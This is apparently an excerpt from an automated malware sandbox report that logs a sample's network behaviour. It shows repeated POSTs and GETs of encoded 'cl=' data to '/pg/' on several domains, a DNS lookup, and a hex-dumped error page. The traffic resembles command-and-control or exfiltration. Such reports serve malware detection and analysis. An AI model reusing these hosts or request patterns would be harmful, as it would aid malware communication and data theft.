cl=1lf-NjjthWFSNY2_kR8W8el3jOnexlCSFQ1TICCSmdiIWfhjEHoJAPvseznCg7mGRcAbjy2BUhFvYfh5cLpeqmi6iQM7Pro_QDOBoHng6mD4UD~k88IURGR4iONxgU68hR8oIWN-uSkfbjloU3ohR9KnEXn8dgybUSs9p8Jkr78HBmorcYyzNr4vD_iyztrZZYXMWL0vJ-uU84SlvKc0g7P7MLNsD54zOfCgYZfbKpZihDaO2HneSSpJRadXjJ(CsqybRFXSCQCNdGYng6xcJmVyOc2whkfQI1Nnslkjci(td5FL4bMpyWCdzLszWeI-JTlqcq7ihID7jTw5wqlMnwPRZayIgEklJoayCzipszll7_0WBqQa9pSjMDySU9VmDgMqPVYiBzTtU9aEfg).). Source: global traffic HTTP traffic detected: POST /pg/ HTTP/1.1Host: www.msdcong.comConnection: closeContent-Length: 161308Cache-Control: no-cacheOrigin: http://www.msdcong.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.msdcong.com/pg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 6c 3d 31 6c 66 2d 4e 6e 66 66 73 47 52 44 4b 71 65 52 31 79 51 5f 31 74 6c 50 6c 2d 7a 61 34 57 54 72 4d 67 49 49 49 43 53 4f 7a 4d 7a 52 53 5f 39 6a 43 42 38 45 62 66 76 74 59 7a 6e 42 78 72 71 2d 4f 65 41 54 6a 7a 43 76 55 68 4e 67 57 39 70 47 63 62 70 4e 72 47 6d 73 7a 77 49 61 50 74 70 56 54 68 6a 48 74 47 62 67 6e 43 76 36 4a 57 69 42 37 5f 63 48 66 53 4a 35 6b 5f 6c 6a 67 6e 28 4c 68 79 42 48 65 48 52 38 6b 41 35 64 58 43 56 41 51 67 4d 69 55 74 65 73 42 55 62 76 58 68 75 66 58 54 73 31 6d 5a 39 6a 69 72 46 58 58 55 78 57 4a 35 47 4b 42 59 77 64 44 2d 6e 4e 37 37 43 64 54 37 6a 55 56 36 34 42 48 72 57 53 69 5f 79 55 6b 6f 6b 46 73 62 28 55 51 36 39 37 55 5a 55 69 65 4d 71 77 62 39 54 57 48 37 74 75 70 57 65 79 31 51 28 6f 50 43 5a 32 59 39 68 41 32 71 33 4b 72 73 4b 35 55 6c 58 70 52 51 43 42 4a 48 34 50 69 62 31 48 4a 33 6c 4d 41 37 4b 76 76 55 7a 52 4a 7a 45 61 69 6b 6b 32 50 69 58 68 4a 62 63 32 7a 75 73 79 35 42 79 68 28 62 73 75 57 59 63 35 4a 54 6c 49 63 76 50 4d 68 37 44 37 68 47 38 75 7a 49 4e 41 68 77 50 51 63 4d 53 47 70 57 78 34 4a 73 32 79 43 43 53 48 72 55 42 6c 28 74 73 5a 42 4f 38 61 74 70 53 6a 46 6a 7a 74 51 4d 30 42 4a 55 63 52 4e 6b 6c 6e 56 56 71 31 63 2d 37 70 42 74 34 5f 44 62 71 77 6a 55 61 53 78 2d 71 63 74 37 4a 6c 6f 33 42 75 50 5a 59 38 61 6c 4b 4c 69 4d 52 38 51 54 46 71 33 77 4f 70 4e 4a 5a 77 4f 68 71 46 71 68 51 72 74 74 7a 6c 79 57 65 39 57 36 55 70 4b 4c 69 56 33 47 62 46 50 55 6c 74 51 53 39 6f 6e 77 4b 6f 39 38 41 74 45 6c 47 73 37 48 79 70 31 4e 4b 79 6b 65 78 31 33 4b 4a 6a 38 43 56 71 64 55 55 34 51 69 54 52 6c 66 46 38 58 76 6c 73 51 38 76 62 6a 4a 65 4c 69 69 4b 47 36 59 41 6c 6c 71 4c 67 4f 44 30 67 58 44 73 37 6e 45 58 63 78 44 61 34 64 66 79 4f 52 6d 57 46 37 59 65 4f 33 50 36 6e 67 77 54 32 56 6c 35 76 6b 39 77 44 69 44 7e 64 62 78 49 58 74 4f 51 59 62 45 6c 79 73 50 50 66 61 74 4f 77 59 53 41 56 63 4e 31 7a 72 77 73 43 48 5f 71 2d 61 33 50 70 6e 59 59 35 70 48 4b 5a 70 34 57 4c 56 30 58 65 63 38 51 47 41 67 78 58 42 4b 73 45 63 46 4d 33 6e 44 6d 6e 61 55 6e 57 37 54 57 6a 67 42 32 48 5a 2d 4e 4a 39 74 39 61 32 67 79 37 37 49 4d 65 4b 77 34 44 36 6a 74 6d 75 57 56 69 71 42 54 61 74 79 48 64 72 6f 46 62 53 53 5a 71 63 48 61 6c 65 72 4b 38 62 49 32 61 77 77 64 45 70 4d 71 4e 79 43 35 6e 65 50 79 4c 6a 57 77 39 70 4a 55 30 31 58 78 43 4a 31 7e 4c 6a 70 67 63 79 36 28 64 54 4c 6e 5f 69 4e 76 45 37 4b 59 76 46 71 37 43 49 36 61 61 79 77 74 70 39 53 69 36 6a 78 4e 5f 35 31 37 76 42 35 37 38 67 47 4e 4b 62 6c 65 4a 56 7a 64 6d 64 62 78 64 55 38 6e 46 51 52 6b 65 7e 37 28 61 67 4b 64 32 65 35 36 2d 61 51 32 62 41 Source: global traffic HTTP traffic detected: POST /pg/ HTTP/1.1Host: www.wshlzhx.comConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.wshlzhx.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.wshlzhx.com/pg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 6c 3d 41 4d 33 30 55 65 78 69 6c 71 37 37 6b 65 44 4a 57 6e 34 6b 65 6f 54 4f 30 76 66 4b 56 6b 4b 61 4b 53 68 56 77 4c 44 76 53 44 65 68 6c 2d 58 72 42 31 38 54 74 52 47 6e 6e 6f 28 63 61 6e 72 44 62 77 68 62 4f 42 58 75 32 58 47 42 52 37 4c 44 5a 4b 46 52 54 30 30 50 73 44 55 35 55 78 59 63 33 52 45 55 52 53 70 58 72 4b 62 6e 4a 55 69 64 72 43 6b 34 52 57 62 75 37 36 57 4d 41 71 35 6d 43 35 70 58 54 32 38 5a 78 70 47 75 4b 49 6b 32 6a 55 32 56 35 39 43 46 69 5a 65 66 6d 37 47 43 45 53 51 51 73 52 57 67 72 2d 79 71 59 6d 78 6d 70 45 75 78 38 38 43 46 59 70 72 31 48 4d 34 59 71 73 55 77 6c 4a 30 39 5a 35 30 59 41 72 79 54 55 6b 5a 58 28 76 39 45 74 5a 7a 69 55 79 6e 6a 63 45 69 41 55 52 75 68 6d 63 4e 72 54 41 53 54 32 34 58 48 55 79 7e 74 64 5f 45 43 63 4c 38 79 42 61 34 76 64 30 43 6e 7e 6f 30 6a 78 36 4f 4b 75 55 74 54 32 48 36 54 74 4d 4a 30 79 79 5a 4b 38 56 47 4c 49 61 79 58 61 7a 4a 67 32 56 4e 56 76 31 79 5f 49 45 35 57 32 6c 59 79 53 6b 37 61 6f 35 48 34 54 70 72 54 50 6e 76 36 66 79 77 36 46 58 6a 64 55 54 4e 4f 64 63 68 43 43 5a 76 32 47 6a 31 39 36 6d 67 47 61 36 6a 53 36 75 42 57 4e 56 61 46 4d 64 4a 49 46 4c 62 39 4e 63 78 74 66 4e 5a 67 39 68 42 54 69 44 4f 30 55 4a 66 62 6f 51 29 2e 00 29 2e 00 00 00 00 00 Data Ascii: cl=AM30Uexilq77keDJWn4keoTO0vfKVkKaKShVwLDvSDehl-XrB18TtRGnno(canrDbwhbOBXu2XGBR7LDZKFRT00PsDU5UxYc3REURSpXrKbnJUidrCk4RWbu76WMAq5mC5pXT28ZxpGuKIk2jU2V59CFiZefm7GCESQQsRWgr-yqYmxmpEux88CFYpr1HM4YqsUwlJ09Z50YAryTUkZX(v9EtZziUynjcEiAURuhmcNrTAST24XHUy~td_ECcL8yBa4vd0Cn~o0jx6OKuUtT2H6TtMJ0yyZK8VGLIayXazJg2VNVv1y_IE5W2lYySk7ao5H4TprTPnv6fyw6FXjdUTNOdchCCZv2Gj196mgGa6jS6uBWNVaFMdJIFLb9NcxtfNZg9hBTiDO0UJfboQ).). Source: global traffic HTTP traffic detected: POST /pg/ HTTP/1.1Host: www.wshlzhx.comConnection: closeContent-Length: 161308Cache-Control: no-cacheOrigin: http://www.wshlzhx.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.wshlzhx.com/pg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 6c 3d 41 4d 33 30 55 63 52 32 32 4b 28 51 76 4d 61 36 47 41 67 46 54 59 4c 62 79 66 62 77 4b 6a 47 67 55 77 31 6a 77 4b 79 48 64 69 4f 7a 79 75 48 72 48 7a 67 49 67 52 47 6b 32 34 28 66 4e 33 6e 5f 55 79 52 54 4f 41 54 49 32 58 4f 4f 62 63 37 47 5a 36 46 38 54 55 49 5f 75 44 51 59 55 7a 74 30 30 7a 6f 63 55 53 6c 58 6c 65 28 68 51 55 65 47 73 47 4d 33 50 32 32 71 33 62 50 4d 41 64 70 53 44 62 56 35 46 6a 59 62 69 71 61 70 47 73 5a 52 30 54 43 67 6d 64 47 43 37 6f 47 4d 70 34 69 47 48 54 52 77 70 51 57 6a 30 64 43 65 49 78 56 45 69 52 4c 46 77 4d 79 33 59 72 4c 44 5a 65 74 45 75 74 49 34 6b 39 6b 62 4e 63 55 61 65 73 65 4c 44 33 77 78 35 76 73 57 31 61 6e 48 44 32 58 4d 64 43 76 64 4a 6c 44 66 67 6f 64 6e 59 56 76 6b 33 4c 37 31 59 54 50 35 52 65 41 5a 4f 61 64 78 43 63 41 37 5a 55 44 4a 38 6f 31 78 7e 75 62 31 6c 56 6c 59 35 30 7a 79 73 50 5a 6a 34 43 31 50 39 58 43 44 47 65 6e 5f 57 67 5a 73 39 47 55 73 6b 45 32 6b 42 54 35 59 6f 56 5a 71 53 6d 43 59 6f 35 48 65 54 74 28 70 4f 57 72 36 65 6d 6b 54 47 32 6a 5a 53 54 4e 70 54 73 78 41 4d 4a 44 6d 47 6e 5a 39 37 57 52 64 62 4e 66 53 70 72 46 56 4e 30 61 46 43 4e 4a 49 49 72 62 7a 43 75 63 39 51 64 64 42 7e 69 63 59 67 57 48 48 65 4b 6d 6f 32 54 79 6c 4b 65 37 54 50 63 51 65 76 50 77 64 6d 36 30 32 41 77 51 6d 46 41 65 4d 62 7a 48 4c 5a 51 41 34 42 68 6d 79 28 2d 37 66 61 72 6a 63 4b 39 53 42 78 57 62 79 79 4c 45 31 49 33 67 61 68 49 72 43 79 61 35 30 63 38 28 56 41 6d 74 4d 74 5a 64 58 4f 37 6d 46 4f 5f 72 4f 38 2d 63 39 57 33 36 79 51 47 71 2d 70 33 6d 41 34 7a 68 38 72 48 73 71 66 54 68 4e 31 4b 69 39 76 62 31 32 41 35 77 79 36 73 64 73 49 35 35 73 4f 4d 4e 75 66 70 76 41 28 6c 47 51 33 53 6a 37 63 56 63 75 6f 4e 4a 36 6a 6d 51 47 61 65 35 34 68 64 75 31 38 31 55 50 4c 32 73 7a 58 65 50 64 68 43 6d 78 74 59 76 79 6e 7a 6d 65 56 67 75 63 59 31 70 41 61 51 6c 67 67 6f 6b 4d 65 4e 35 70 33 4a 31 70 47 64 70 4a 37 76 65 49 65 49 43 74 72 71 5a 49 54 38 28 4e 77 78 76 32 6e 4d 55 44 32 45 6d 46 4e 34 64 4e 6f 4c 74 75 7e 47 51 55 59 41 6c 42 6e 4f 43 30 55 46 54 4b 46 63 6c 61 6f 4d 39 54 30 61 4b 54 69 58 73 6f 65 76 4a 51 35 77 73 58 49 36 6b 59 35 56 53 35 73 4e 38 72 42 68 74 79 58 48 55 42 72 32 42 54 46 76 31 44 35 6d 72 77 57 61 4e 37 45 4b 6f 75 42 5a 44 38 6d 6f 32 64 79 4e 57 4d 62 51 69 73 43 56 59 4f 55 32 4f 71 6e 53 45 4e 74 4b 66 4b 4c 4b 7a 67 51 67 7e 65 54 72 4f 71 52 7a 58 71 73 32 75 45 42 47 4f 72 58 48 58 59 6a 76 48 6b 4c 4d 39 4c 4b 30 35 4a 49 62 36 5f 31 35 63 44 76 35 51 49 48 39 45 44 6a 6e 64 50 38 4f 6f 7a 34 34 79 69 76 62 50 73 4b 38 63 2d 79 50 73 37 7a 78 77 70 6d 72 33 74 44 Source: global traffic HTTP traffic detected: POST /pg/ HTTP/1.1Host: www.zcn4.comConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.zcn4.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.zcn4.com/pg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 6c 3d 78 48 6a 5f 6a 2d 73 71 48 6b 64 2d 74 76 34 51 59 67 69 5f 38 44 54 32 6b 59 69 66 68 4c 69 5f 46 37 58 44 43 4e 66 33 28 48 6f 61 39 31 4b 67 57 56 5a 57 72 71 45 53 47 47 4f 50 69 52 38 6d 4a 59 31 50 52 57 70 56 59 54 33 67 37 4c 74 59 57 30 64 59 56 4b 77 63 78 63 38 38 79 55 78 72 6a 4e 6a 50 74 65 4d 53 65 6b 72 54 37 42 74 61 50 39 69 2d 6e 58 4e 71 6c 62 4c 4f 62 33 7a 4b 30 5a 37 53 79 5a 68 5a 76 75 72 33 49 2d 73 41 4e 6d 6a 50 6a 42 61 66 30 62 69 42 79 70 54 79 48 37 54 57 57 6d 46 33 62 6b 43 55 51 4a 63 64 75 4a 31 61 6b 4f 5a 76 74 73 65 59 57 57 74 2d 32 59 48 63 54 56 69 72 33 4e 39 34 4c 42 35 6c 33 4f 7a 38 43 33 6b 64 73 33 4b 45 33 33 6d 5f 79 75 65 51 6c 6e 63 51 7e 79 63 6b 30 56 70 58 74 67 51 32 71 64 62 44 44 6b 4e 36 37 54 28 57 44 72 6a 4d 68 37 77 4b 37 4a 44 69 41 49 51 77 37 47 6b 70 66 70 49 41 28 74 39 34 74 5a 49 70 6b 62 63 47 48 67 59 59 32 6e 44 54 6d 61 36 4a 4b 5a 4c 61 55 46 61 61 43 35 77 32 58 72 77 61 62 77 64 6d 72 59 6a 77 74 41 4e 34 4f 70 69 49 45 6c 53 50 4f 72 32 64 71 35 4b 6d 71 75 73 4e 58 71 6d 51 48 74 35 4c 66 69 59 6a 57 5f 64 47 74 39 69 6c 31 6e 38 4a 64 76 6a 52 35 38 64 67 4e 59 45 4d 6e 53 52 6d 33 65 57 42 75 76 62 63 6a 77 29 2e 00 55 4a 66 62 6f 51 29 Data Ascii: cl=xHj_j-sqHkd-tv4QYgi_8DT2kYifhLi_F7XDCNf3(Hoa91KgWVZWrqESGGOPiR8mJY1PRWpVYT3g7LtYW0dYVKwcxc88yUxrjNjPteMSekrT7BtaP9i-nXNqlbLOb3zK0Z7SyZhZvur3I-sANmjPjBaf0biBypTyH7TWWmF3bkCUQJcduJ1akOZvtseYWWt-2YHcTVir3N94LB5l3Oz8C3kds3KE33m_yueQlncQ~yck0VpXtgQ2qdbDDkN67T(WDrjMh7wK7JDiAIQw7GkpfpIA(t94tZIpkbcGHgYY2nDTma6JKZLaUFaaC5w2XrwabwdmrYjwtAN4OpiIElSPOr2dq5KmqusNXqmQHt5LfiYjW_dGt9il1n8JdvjR58dgNYEMnSRm3eWBuvbcjw).UJfboQ) Source: global traffic HTTP traffic detected: POST /pg/ HTTP/1.1Host: www.zcn4.comConnection: closeContent-Length: 161308Cache-Control: no-cacheOrigin: http://www.zcn4.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.zcn4.com/pg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 6c 3d 78 48 6a 5f 6a 36 77 55 42 55 59 6c 28 4a 46 6c 66 54 4f 65 6f 6d 54 77 6f 49 32 70 7e 49 79 42 48 72 37 54 43 4e 50 7a 33 6c 52 47 34 55 61 67 64 77 74 49 6d 71 45 4e 41 47 4f 4f 6d 52 67 77 41 76 49 44 52 58 64 5f 59 54 28 68 79 74 42 64 58 6b 64 31 45 61 30 67 67 4d 6f 37 79 53 77 4c 6a 76 4f 63 6f 65 41 53 41 45 7a 52 69 41 39 4e 47 63 75 78 71 48 51 42 70 36 53 51 62 6e 50 32 30 37 48 30 6a 64 68 68 71 64 32 31 44 65 63 73 4a 31 44 51 38 68 4f 55 6f 49 65 6f 74 59 66 32 47 36 53 6a 4b 58 46 30 57 30 71 61 47 37 46 67 71 38 52 4a 33 75 49 63 74 72 69 69 4f 56 4a 76 79 65 43 52 52 6e 47 42 28 5a 6c 36 45 51 35 39 6d 64 62 42 50 57 31 4a 6b 55 65 68 38 30 53 71 28 49 44 62 72 6c 73 72 34 44 67 57 38 45 5a 6a 39 41 6b 2d 6d 38 72 38 4a 48 63 36 73 79 66 6b 4e 4a 50 6d 6b 62 78 6d 6f 5a 44 75 49 61 6f 4d 74 48 67 32 4e 70 34 69 7e 74 45 6b 6a 6f 6b 6f 70 35 59 34 4e 6b 30 6a 77 45 7a 48 74 49 54 2d 50 4c 6e 76 64 57 48 72 66 4a 78 35 58 70 59 56 62 77 64 55 72 5a 69 56 69 52 5a 34 50 34 43 62 48 47 37 41 47 4c 33 66 6f 74 75 65 6b 38 34 64 58 71 7e 51 45 34 64 79 66 52 49 6a 61 4a 78 48 74 63 69 6c 32 58 38 4a 45 66 69 4e 34 4f 73 52 54 39 51 75 6d 6b 51 79 32 70 48 39 36 5f 79 54 67 6d 6c 6b 44 37 4f 79 33 4f 77 69 74 58 51 38 67 52 39 33 39 59 54 6a 35 77 4d 46 28 72 47 49 44 61 79 42 41 74 63 30 4e 35 4a 49 62 71 51 31 73 6c 41 5f 44 73 41 70 78 70 53 50 67 33 61 59 70 4a 62 5f 62 43 79 35 4a 4c 54 73 70 76 41 72 4e 4b 41 5f 43 73 73 54 33 7a 67 6a 42 34 4b 56 37 51 6a 44 7a 7a 39 33 64 73 4d 6a 4a 77 62 44 65 57 69 78 75 72 69 57 47 31 61 36 67 46 78 79 35 75 72 54 68 47 7a 31 62 59 30 51 33 68 63 42 69 63 33 4d 68 48 39 62 78 58 4f 66 59 68 28 42 79 4e 4e 4a 5a 56 6d 4a 39 56 50 63 33 49 49 6f 6b 4b 33 39 44 4a 30 34 32 52 46 53 6a 59 39 66 77 50 30 5a 67 51 48 53 43 56 68 4b 7a 46 42 74 41 62 71 4b 62 51 32 43 37 55 79 42 31 5f 4c 37 58 55 35 4c 74 51 61 67 31 39 34 76 4a 48 44 32 74 62 59 4c 61 70 77 31 41 61 6a 63 4e 6e 54 6e 64 65 4b 30 70 45 6b 41 55 44 74 4d 56 2d 38 50 30 57 72 67 6d 30 48 33 74 77 44 59 6b 5f 32 4a 48 41 41 48 56 76 33 38 33 39 44 63 4e 47 47 4a 39 2d 7a 56 66 47 59 2d 72 35 32 5f 53 34 38 39 6e 30 52 50 57 50 6b 33 75 68 42 38 6a 47 77 72 55 32 32 67 43 4f 4c 43 62 57 34 67 70 56 47 33 77 72 32 56 42 65 4a 77 57 71 73 43 4d 77 74 77 45 65 57 78 76 71 71 50 62 45 52 78 47 71 69 56 46 67 75 41 52 77 4a 63 4d 39 31 74 52 55 6b 69 70 61 52 58 6d 4c 53 2d 70 48 34 62 67 70 67 77 38 61 55 4f 6c 66 4e 30 74 72 69 63 6a 70 4b 43 65 59 42 55 53 6e 63 6b 34 73 49 4b 6c 34 4c 50 64 74 39 45 6e 34 34 42 51 59 59 65 28 42 68 4e 55 50 68 76
 Downloads files from webservers via HTTP Show sources
 Source: global traffic HTTP traffic detected: GET /pg/?cl=e4vtZaDIaVjVbVsGLqeRzvTTrFG4L6g9xJG3vo9VJEHdPRYNiZrjWKGrMWwHCGmSe8hL&2drl7=sL04ivN0C HTTP/1.1Host: www.alwaysbucheon.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /pg/?cl=bp3gRoXoP4yEgK1sgJSYJfU+FssScB904rbINqXJ/OBc+k4pi0Qt4zKRKRSxUz2ykIhM&2drl7=sL04ivN0C HTTP/1.1Host: www.frengeen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /pg/?cl=RA/4Irk5P4f6SUywnqVLcdKqFQC5UyywDrBVn7AQH3o0gkoTjo44CDVTLwAwj/6QVTo4&2drl7=sL04ivN0C HTTP/1.1Host: www.aalldxea.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /pg/?cl=9HTETHSv3BkodYmkolV6gIdBk+nR/n7VQF8IV1eTi9ORfvNnIi0cIKnqFVKcp7KNM91B&2drl7=sL04ivN0C HTTP/1.1Host: www.msdcong.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /pg/?cl=Iu7OK7c719yg5+rObwJSE42h0tf2fXC4Qmo10pi2UhOWitvONWxHvB/i0oS+D3HNIxcl&2drl7=sL04ivN0C HTTP/1.1Host: www.wshlzhx.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /pg/?cl=5lvF9aNASzw0/ednaHrHq3bCrY2s26KKXO6afqfWx34cy2T8YgpekM9WcQWNtwYcYtQM&2drl7=sL04ivN0C HTTP/1.1Host: www.zcn4.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /pg/?cl=e4vtZaDIaVjVbVsGLqeRzvTTrFG4L6g9xJG3vo9VJEHdPRYNiZrjWKGrMWwHCGmSe8hL&2drl7=sL04ivN0C HTTP/1.1Host: www.alwaysbucheon.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 Performs DNS lookups Show sources
 Source: unknown DNS traffic detected: queries for: www.hot7slot.com
 Posts data to webserver Show sources
 Source: unknown HTTP traffic detected: POST /pg/ HTTP/1.1Host: www.frengeen.comConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.frengeen.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.frengeen.com/pg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 6c 3d 54 4c 37 61 50 50 57 30 65 64 37 38 33 61 70 2d 6b 65 76 75 62 72 6f 67 52 39 4d 46 4b 51 35 6d 69 73 75 4d 5a 72 69 52 33 65 35 6d 28 51 77 49 6c 33 68 6f 77 30 4c 56 63 69 69 31 58 41 47 49 79 34 67 6e 75 45 4b 44 36 4c 4c 4e 6d 41 33 41 58 62 6c 45 4c 57 6c 45 75 61 7e 5f 79 31 4a 32 32 43 7e 33 4d 53 41 7a 41 38 50 47 36 41 36 41 72 54 56 49 33 68 6f 55 57 4b 6c 6c 51 6d 51 65 76 5a 4c 54 38 70 6b 35 4c 35 43 72 66 70 71 69 46 73 6b 58 35 64 58 47 6d 37 74 55 6a 42 66 58 61 31 6c 66 37 78 67 79 78 56 77 54 4c 71 50 75 5a 45 78 41 4e 31 48 39 55 75 36 51 53 5a 43 4e 5a 7a 52 62 6d 37 41 50 77 55 67 33 7e 71 6d 61 32 5a 6c 6c 42 72 55 63 38 44 71 77 4d 6f 39 59 6b 42 58 42 69 5a 63 61 55 37 59 55 28 63 53 39 55 77 69 4d 36 78 71 69 78 72 67 59 43 75 38 6f 59 5f 61 79 75 57 67 43 6e 67 36 2d 71 61 76 35 45 4b 54 44 62 5f 47 5a 59 48 42 47 58 73 71 33 78 6b 39 38 34 76 70 71 38 79 6a 6d 51 64 37 46 42 55 36 55 75 58 57 35 49 6f 39 33 65 6d 54 68 38 58 41 5f 65 7a 5a 69 4f 41 76 4e 43 51 35 41 30 47 31 36 76 69 4c 6f 55 6b 45 79 5a 5a 76 70 73 76 56 5a 34 56 76 42 4d 77 54 79 78 54 55 50 51 51 66 4b 71 41 52 30 76 48 73 30 7e 31 49 4f 31 51 73 64 49 36 4d 65 69 5f 47 79 45 6e 79 61 4b 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: cl=TL7aPPW0ed783ap-kevubrogR9MFKQ5misuMZriR3e5m(QwIl3how0LVcii1XAGIy4gnuEKD6LLNmA3AXblELWlEua~_y1J22C~3MSAzA8PG6A6ArTVI3hoUWKllQmQevZLT8pk5L5CrfpqiFskX5dXGm7tUjBfXa1lf7xgyxVwTLqPuZExAN1H9Uu6QSZCNZzRbm7APwUg3~qma2ZllBrUc8DqwMo9YkBXBiZcaU7YU(cS9UwiM6xqixrgYCu8oY_ayuWgCng6-qav5EKTDb_GZYHBGXsq3xk984vpq8yjmQd7FBU6UuXW5Io93emTh8XA_ezZiOAvNCQ5A0G16viLoUkEyZZvpsvVZ4VvBMwTyxTUPQQfKqAR0vHs0~1IO1QsdI6Mei_GyEnyaKA).
 Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable) Show sources
 Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Mar 2020 17:58:44 GMTServer: ApacheLast-Modified: Thu, 26 Mar 2020 02:08:11 GMTETag: "720-5a1b874e878c0"Accept-Ranges: bytesContent-Length: 1824Connection: closeContent-Type: text/htmlData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6b 6f 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 49 53 54 4f 52 59 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 2f 74 31 2e 64 61 75 6d 63 64 6e 2e 6e 65 74 2f 74 69 73 74 6f 72 79 5f 61 64 6d 69 6e 2f 77 77 77 2f 73 74 79 6c 65 2f 74 6f 70 2f 66 6f 6e 74 2e 63 73 73 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 2f 74 31 2e 64 61 75 6d 63 64 6e 2e 6e 65 74 2f 74 69 73 74 6f 72 79 5f 61 64 6d 69 6e 2f 77 77 77 2f 73 74 79 6c 65 2f 74 6f 70 2f 65 72 72 6f 72 5f 32 30 31 39 30 38 31 34 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6b 61 6b 61 6f 49 6e 64 65 78 22 3e 0a 20 20 20 20 3c 61 20 68 72 65 66 3d 22 23 6b 61 6b 61 6f 42 6f 64 79 22 3e eb b3 b8 eb ac b8 20 eb b0 94 eb a1 9c ea b0 80 ea b8 b0 3c 2f 61 3e 0a 20 20 20 20 3c 61 20 68 72 65 66 3d 22 23 6b 61 6b 61 6f 47 6e 62 22 3e eb a9 94 eb 89 b4 20 eb b0 94 eb a1 9c ea b0 80 ea b8 b0 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 69 64 3d 22 6b 61 6b 61 6f 57 72 61 70 22 20 63 6c 61 73 73 3d 22 74 69 73 74 6f 72 79 5f 74 79 70 65 33 22 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 6b 61 6b 61 6f 43 6f 6e 74 65 6e 74 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 4d 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 6d 41 72 74 69 63 6c 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 5f 65 72 72 6f 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6e 6e 65 72 5f 65 72 72 6f 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 5f 74 69 73 74 6f 72 79 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 20 69 64 3d 22 6b 61 6b 61 6f 42 6f 64 79 22 20 63 6c 6
 Urls found in memory or binary data Show sources
